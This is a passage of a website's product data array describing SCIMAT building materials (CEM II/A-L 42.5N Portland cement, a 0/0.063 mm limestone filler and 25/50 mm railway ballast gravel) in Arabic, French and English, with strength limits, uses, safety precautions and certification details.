<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تهدف SCIMAT إلى أن تكون الشركة الأكثر أمانًا في المجتمع من خلال تحسين ظروف العمل لتجنب أي إصابات جسدية وتداعيات صحية مرتبطة بأنشطتها</span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>تدابير وقائية:</strong></u></span></span></span></p>
<ul dir="rtl">
<li style="text-align:left">
<p style="text-align:justify"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> يخلط مع الماء ، والأسمنت مزعج.</span></span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تجنب ملامسة العينين والجلد؛</span></span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> اغسل جميع المناطق المكشوفة على الفور بكمية كبيرة من الماء ؛</span></span></span></p>
</li>
<li style="text-align:left">
<p style="text-align:justify"><span dir="rtl" lang="ar"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> في حالة ملامسة العين لا بد من استشارة الطبيب.</span></span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">لمزيد من التفاصيل ، يرجى الرجوع إلى ورقة بيانات السلامة التفصيلية. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>البيئة</strong></u><strong>:</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">تهدف SCIMAT إلى أن تكون بشكل دائم مثالاً للمسؤولية البيئية للمجتمع من خلال حماية البيئة ، بما في ذلك منع التلوث واستخدام الموارد المستدامة من خلال:</span></span></p>
<ul dir="rtl">
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> الحفاظ على الموارد الطبيعية ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> الحد من انبعاثات الغلاف الجوي ؛</span></span></p>
</li>
<li>
<p style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> التمكن من إدارة النفايات</span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align:justify"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong><u>التخزين:</u> </strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يجب تخزين الأسمنت في مكان جاف وحمايته من الرطوبة</span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong></strong></span></span></span><br />
</p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#40E0D0"><u><strong>التكييف</strong></u><strong> : </strong></span><span style="color:#008000"><strong> </strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يتم تسليم الأسمنت البورتلاندي <strong>CEM II A-L 42.5 N</strong> سائبًا وفي أكياس سعة 50 كجم. </span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#000080"><strong> <u>الشهادة</u> :</strong></span></span></span></p>
<p dir="rtl" style="text-align:justify"><span style="font-family:times new roman,times,serif; font-size:16px">تم اعتماد </span><strong>CEM II / A (P-L) 42.5N</strong><span style="font-family:times new roman,times,serif; font-size:16px"> وفقًا للمعيار الجزائري </span><strong>2013/442</strong><span style="font-family:times new roman,times,serif; font-size:16px"> مع علامة المطابقة الوطنية </span><strong>TEDJ</strong><span style="font-family:times new roman,times,serif; font-size:16px"> الصادرة عن المعهد الجزائري للتقييس -IANOR-.</span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Composition</strong></u><strong> :</strong></span><br />
The <strong>Cement Portland</strong> with Limestone <strong>CEM II/A-L 42,5N -NA 442/2013</strong>- results from the mixture of clinker in a quantity at least equal to 88-82% and other constituents such as Tuff & Pozzolana, the total of which does not exceed 7-13%.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Limit Values</strong></u></span><strong> :</strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The limit values for minimum strengths are set for 2 and 28 days. The limit values are also set for the SO3 content below 3.5% and the chloride ion content below 0.10%.</span></span></p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><span style="color:#008000">Compressive strength limit value for CEM II / A-L 42.5N -NA 442/2013-</span></strong></span></span></p>
<table align="center" border="1" cellpadding="0" cellspacing="0" style="height:413px; width:425px">
<tbody>
<tr>
<td style="height:88px; width:110px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Resistance Class</strong></span></span></p>
<p style="text-align:center"> </p>
<p style="text-align:center"> </p>
</td>
<td style="height:88px; width:142px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Limit of Resistance according to Standard NA 442</strong></span></span></p>
</td>
<td style="height:88px; width:120px">
<p style="text-align:center"> </p>
<div class="QmZWSe">
<div class="DHcWmd" style="text-align: center;"> </div>
</div>
<div class="oSioSc">
<div id="tw-target">
<div class="g9WsWb" id="kAz1tf">
<div class="tw-ta-container hide-focus-ring tw-nfl" id="tw-target-text-container">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Specified Lower Limit<br />
of our Cement</strong></span></span></p>
</div>
</div>
</div>
</div>
<p style="text-align:center"> </p>
</td>
<td style="height:88px; width:151px">
<p style="text-align:center"> </p>
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Specified Upper Limit of our Cement</strong></span></span></p>
<p style="text-align:center"> </p>
</td>
</tr>
<tr>
<td style="height:85px; width:110px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>02 days</strong></span></span></p>
</td>
<td style="height:85px; width:142px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>≥ 10,0</strong></span></span></p>
</td>
<td style="height:85px; width:120px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>22.08</strong></span></span></p>
</td>
<td style="height:85px; width:151px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>25.98</strong></span></span></p>
</td>
</tr>
<tr>
<td style="height:57px; width:110px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>28 days</strong></span></span></p>
</td>
<td style="height:57px; width:142px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>62.5≤res≥42,5</strong></span></span></p>
</td>
<td style="height:57px; width:120px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>44,18</strong></span></span></p>
</td>
<td style="height:57px; width:151px">
<p style="text-align:center"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>48.49</strong></span></span></p>
</td>
</tr>
</tbody>
</table>
<div style="clear:both;"> </div>
<div style="clear:both;">
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Quality Control</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">SCIMAT manufactures and markets <strong>Quality</strong> Cements in accordance with Algerian Standards in force. They are periodically checked by the Center for Studies and Technological Services of the Building Materials Industry -CETIM- (accredited according to the ISO 17025 Standard).</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#008000">Main fields of employment</span></strong></u><strong><span style="color:#008000"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>CEM II/A-L 42,5N</strong> -<strong>NA 442/2013-</strong>is suitable for all types of reinforced concrete work. Our Cement is suitable for prestressed concrete and reinforced concrete. In general, the<strong> CEM II/A-L 42,5N</strong> -<strong>NA 442/2013-</strong> is well suited for massive work requiring a moderate rise in temperature. The Class R will be preferred for work requiring higher initial strengths. For work in aggressive environments, the Cement will be used for work at sea (PM) or resistant to sulphated water (ES).</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Special precautions</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">When the aesthetic aspect is important (raw concrete, plasters), it is advisable to avoid the use of certain <strong>CEM II</strong> comprising large proportions of constituents liable to cause too marked variations in color, particularly fly ash.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Specific and General Recommendations</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use clean aggregates, free from organic matter;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Respect the dosages and the rules of the art for the<br />
implementation;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Aim for a Water /Cement ratio, preferably as low<br />
as possible, compatible with good rheology of<br />
fresh concrete;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use standardized adjuvants;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Avoid premature drying out in hot or windy weather by curing the concrete (watering, damp tarpaulin, curing products, etc.); </span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Adapt the vibration of the concrete to its consistency<br />
to obtain optimum compactness without segregation;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Avoid all contact with skin and eyes;</span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> Use suitable equipment : gloves, waterproof shoes, glasses, etc.</span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#FF0000"><strong><u>Security</u> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The SCIMAT aims to be the safest employer in the Society by improving working conditions to avoid any bodily injury and health repercussions related to its activities.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Protective Measures</strong></u><strong> :</strong></span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Mix with water, the Cement is irritating;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Avoid contact with eyes and skin;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Immediately wash all exposed areas with plenty of water;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> In the event of contact with the eyes, it is essential to consult a doctor.</span></span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">For more details, please refer to the detailed Safety Data Sheet.</span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#008000">Environment</span></strong></u><strong><span style="color:#008000"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">The SCIMAT aims to be a constant example of the ecological responsibility of the </span>Society<span style="color:#000000"> through the protection of the environment, including the prevention of pollution and the use of sustainable resources by:</span></span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Preservation of natural resources;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Reduction of atmospheric emissions;</span></span></span></li>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> Mastery of waste management.</span></span></span></li>
</ul>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><u><strong>Storage</strong></u><strong> :</strong></span></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The Cement must be stored in a dry place and protected from humidity.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#40E0D0"><strong><u>Conditioning</u> :</strong></span><br />
The <strong>Cement Portland CEM II / AL 42.5N-NA 442/2013-</strong> is delivered in bulk and in bags of 50 kg.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u><strong><span style="color:#4B0082">Certification</span></strong></u><strong><span style="color:#4B0082"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Cement Portland CEM II / AL 42.5N</strong> is certified according to the <strong>Algerian Standard 442/2013</strong> with the National Conformity Mark <strong>TEDJ</strong> issued by the Algerian Institute for Standardization -IANOR-.</span></span></p>
</div>
',
'img_prd' => 'produit-1716888973.png',
'img_prd_detail' => '',
'Code_Pr' => '78999',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1716804329.pdf',
'pos_slider' => '9'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 3 => array(
'Produit' => array(
'id' => '59998',
'nom_fr' => 'Filler 0/0,063 mm ',
'nom_ara' => 'Filler 0/0,063 mm الحشو 0 / 0.063 مم ',
'nom_en' => 'Filler 0/0,063 mm ',
'sous_nom_fr' => '',
'sous_nom_ara' => '',
'sous_nom_en' => '',
'date_ajout' => '2021-01-26',
'image' => '',
'contenu_fr' => '<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le <strong>Filler 0/0,063</strong> <strong>mm</strong> est un granulat fin destiné à remplir, à charger divers produits des industries du BTP. </span></span></small></span></p>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le <strong>Filler 0/0,063</strong> <strong>mm </strong>est une<strong> </strong>matière minérale, finement divisée destinée à remplir (de l'Anglais to fill) les vides laissés par un empilement granulaire de graviers, gravillons et sables. </span></span></small></span></p>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le terme <strong>Filler</strong> se rapporte à la petite taille des grains qui le constitue. La nature chimico- minéralogique du <strong>Filler</strong> peut varier, il s'agit généralement de calcaire broyé mais les cendres volantes, la fumée de silice ou une combinaison de ces matériaux peut être utilisée comme <strong>Filler</strong>. </span></span></small></span></p>
<ul>
</ul>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le <strong>Filler 0/0,063</strong> <strong>mm</strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></small></span></p>
<p><span style="color:#008000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong><u>Utilisations</u> :</strong></span></span></small></span></p>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le <strong>Filler 0/0,063</strong> <strong>mm </strong>charge :</span></span></small></span></p>
<ul>
<li>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">L'asphalte artificiel à des doses voisines de 10 %, pour son pouvoir rigidifiant ;</span></span></small></span></p>
</li>
<li>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Les enrobés bitumineux ,à des doses voisines de 3 à 4 % ou 5 à 6 %, pour son pouvoir rigidifiant ;</span></span></small></span></p>
</li>
<li>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Les bétons de ciment hydraulique, à des doses voisines de 50 à 80 kg par m<sup>3</sup>, comme substitution du ciment ; il s'agit le plus souvent de la fumée de silice (micro- ou nanoparticules issues de la métallurgie du silicium et de ses alliages).</span></span></small></span></p>
</li>
</ul>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">L'utilisation des <strong>Fillers</strong> dans des dosages appropriés dans la formulation des bétons permet d'améliorer les propriétés d'écoulement du béton frais et les résistances mécaniques du béton durcis.</span></span></small></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>الحشو 0 / 0.063 مم</strong><span style="color:#000000">-</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler 0/0,063</strong> <strong>mm</strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">- عبارة عن </span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">رمل</span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> ناعم مخصص لملء وتحميل منتجات مختلفة<small> من صناعات البناء.</small></span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>الحشو 0 / 0.063 مم</strong><span style="color:#000000">-</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler 0/0,063</strong> <strong>mm</strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> عبارة عن مادة معدنية مجزأة بدقة تهدف إلى ملء (من الإنجليزية ملء) الفراغات التي تتركها كومة حبيبية من الحصى والشظايا والرمال.</span></span></small></p>
<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يشير مصطلح <strong>فيلر</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler </strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> إلى صغر حجم الحبوب التي تتكون منها. يمكن أن تختلف الطبيعة الكيميائية المعدنية للحشو ، وعادة ما يكون من الحجر الجيري المطحون ولكن يمكن استخدام الرماد المتطاير أو دخان السيليكا أو مزيج من هذه المواد كمواد مالئة.</span></span></small></p>
<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يتم التحكم في </span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>الحشو 0 / 0.063 مم </strong><span style="color:#000000">-</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler 0/0,063</strong> <strong>mm</strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> وفقًا لمعيار <strong>NA</strong> <strong>5113</strong>.</span></span></small></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:20px"><span style="color:#008000"><strong><small><u>مجال الاستعمال</u> :</small></strong></span></span></p>
<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يملأ <strong>الحشو 0 / 0.063 </strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong><span style="color:#000000"> -</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler 0/0,063</strong> <strong>mm</strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> :</span></span></small></p>
<ul dir="rtl">
<li style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">إسفلت صناعي بجرعات تقترب من 10٪ لقدرته على التقوية ؛</span></span></small></li>
<li style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">الخلائط البيتومينية بجرعات تقارب 3 إلى 4٪ أو 5 إلى 6٪ لقوتها التقوية ؛</span></span></small></li>
<li style="text-align: justify;"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">خرسانة </span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif">الأسمنت الهيدروليكي ، بجرعات قريبة من 50 إلى 80 كجم لكل متر مكعب ، كبديل للأسمنت ؛ غالبًا ما يكون دخان السيليكا (جزيئات دقيقة أو نانوية من تعدين السيليكون وسبائكه)</span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">.</span></span></small></li>
</ul>
<p dir="rtl" style="text-align: justify;"> <span style="font-family:times new roman,times,serif"><span style="font-size:16px">إن استخدام <span style="color:#000000">-<strong>Fillers </strong>-</span> بالجرعات المناسبة في صياغة الخرسانة يجعل من الممكن تحسين خصائص التدفق للخرسانة الطازجة والقوة الميكانيكية للخرسانة المتصلدة.</span></span> </p>
',
'contenu_en' => '<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Filler 0/0.063 mm</strong> is a fine aggregate intended to fill, to load various products of the construction industries.</span></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Filler 0/0.063 mm</strong> is a finely divided mineral material intended to fill the voids left by a granular pile of gravel, chippings and sands.</span></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The term <strong>Filler </strong>refers to the small size of the grains that constitute it. The chemico-mineralogical nature of the <strong>Filler</strong> can vary, it is usually ground limestone but fly ash, silica fume or a combination of these can be used as a <strong>Filler</strong>.</span></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Filler</strong> <strong>0/0.063 mm</strong> is controlled according to the <strong>NA 5113 </strong>Standard.</span></span></span></p>
<p style="text-align:left"><span style="color:#008000"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>Uses</u> :</span></span></strong></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Filler 0/0.063 mm</strong> charges:</span></span></span></p>
<ul>
<li style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Artificial asphalt at doses close to 10%, for its </span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif">stiffening power;</span></span></span></li>
<li style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Bituminous mixes, at doses close to 3 to 4% or 5 to 6%, for its stiffening power;</span></span></span></li>
<li style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Hydraulic cement concretes, at doses close to 50 to 80 kg per m3, as a replacement for cement; it is most often silica fume (micro- or nanoparticles from the metallurgy of silicon and its alloys).</span></span></span></li>
</ul>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The use of <strong>Fillers </strong>in appropriate dosages in the formulation of concrete makes it possible to improve the flow properties of fresh concrete and the mechanical strengths of hardened concrete.</span></span></span></p>
',
'img_prd' => 'produit-1611671831.png',
'img_prd_detail' => '',
'Code_Pr' => '59998',
'prix_u' => '500',
'fiche_technique' => 'fiche_technique-1615802851.pdf',
'pos_slider' => '1'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 4 => array(
'Produit' => array(
'id' => '9959',
'nom_fr' => 'Gravier Ballast',
'nom_ara' => ' حصى الصابورة Ballast حصى',
'nom_en' => 'Gravel Ballast',
'sous_nom_fr' => '25/50 mm',
'sous_nom_ara' => '50/25 مم',
'sous_nom_en' => '25/50 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"><strong>25/50 mm</strong> est </span>le lit de pierres ou de graviers sur lequel repose une voie de chemin de fer.</span></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif">désigne le mélange de cailloux et de sable répandu sur le sol, sous la voie ferrée. Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"> est entré dans l’usage et a supplanté ensablement. </span></span></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Les éléments du <strong>Gravier Ballast </strong></span></span><span style="font-family:times new roman,times,serif"><span style="color:#000000"> généralement utilisés: de la pierre concassée, de </span><a href="https://fr.wikipedia.org/wiki/Granulom%C3%A9trie" title="Granulométrie"><span style="color:#000000">g</span></a><span style="color:#000000">ranulométrie variant entre 31,5 et 50 mm. Le type de roches utilisées varie suivant les régions et pays en fonction du climat. On trouve des roches de type plutonique : granite, diorite, etc. </span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">Les éléments du </span></span><span style="color:#000000"><span style="font-family:times new roman,times,serif"><strong>Gravier Ballast </strong> doivent s'imbriquer de façon à former une masse compacte mais perméable.</span></span></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"><strong>25/50 mm</strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></span></p>
<p><span style="color:#008000"><u><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Utilisations</span></span></strong></u><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> :</span></span></strong></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"><strong>25/50 mm</strong></span></span><span style="font-family:times new roman,times,serif"><strong> </strong>est utilisé dans les :</span></span> </p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px"><strong>Voies Ferroviaires<em> </em></strong></span></small></span></span></p>
</li>
</ul>
<p><span style="color:#008000"><span style="font-size:16px"><u><strong><span style="font-family:times new roman,times,serif">Contraintes</span></strong></u><strong><span style="font-family:times new roman,times,serif"> :</span></strong></span></span></p>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"> subit deux types d'usure :</span></span></span></p>
<ul>
<li>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Contamination par des matériaux parasites, par exemple de la terre. On procède à des désherbages, mais il est nécessaire de remplacer le <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"> régulièrement ;</span></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">Tassement du <strong>Gravier Ballast</strong></span> <span style="font-family:times new roman,times,serif"> sous les traverse; il provoque une déformation verticale de la voie. Il est nécessaire de réinjecter du <strong>Gravier Ballast</strong> de faible granulométrie sous les traverses; ou bien de réaliser une opération d'entretien à l'aide d'une bourreuse. Ce genre d'opération se réalise environ tous les sept ans.</span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="color:#000000"><span style="font-family:times new roman,times,serif">On tamise le <strong>Gravier Ballast</strong> chaque vingtaine d'années pour remplacer les pierres brisées. Le <strong>Gravier Ballast</strong> présente une durée d'utilisation d'une quarantaine d'années avant de devoir être intégralement remplacé.</span></span></span></p>
<p> </p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><strong>حصى الصابورة </strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>25/50 مم</strong> هو </span></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">طبقة</span></span></small> <span style="font-family:times new roman,times,serif"><span style="font-size:16px">الحجارة أو الحصى الذي يرتكز عليه مسار سكة الحديد.</span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif">ت</span></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px">شير </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> إلى خليط الحصى والرمل المنتشر على الأرض أو أسفل خطوط السكك الحديدية.</span></span></span></p>
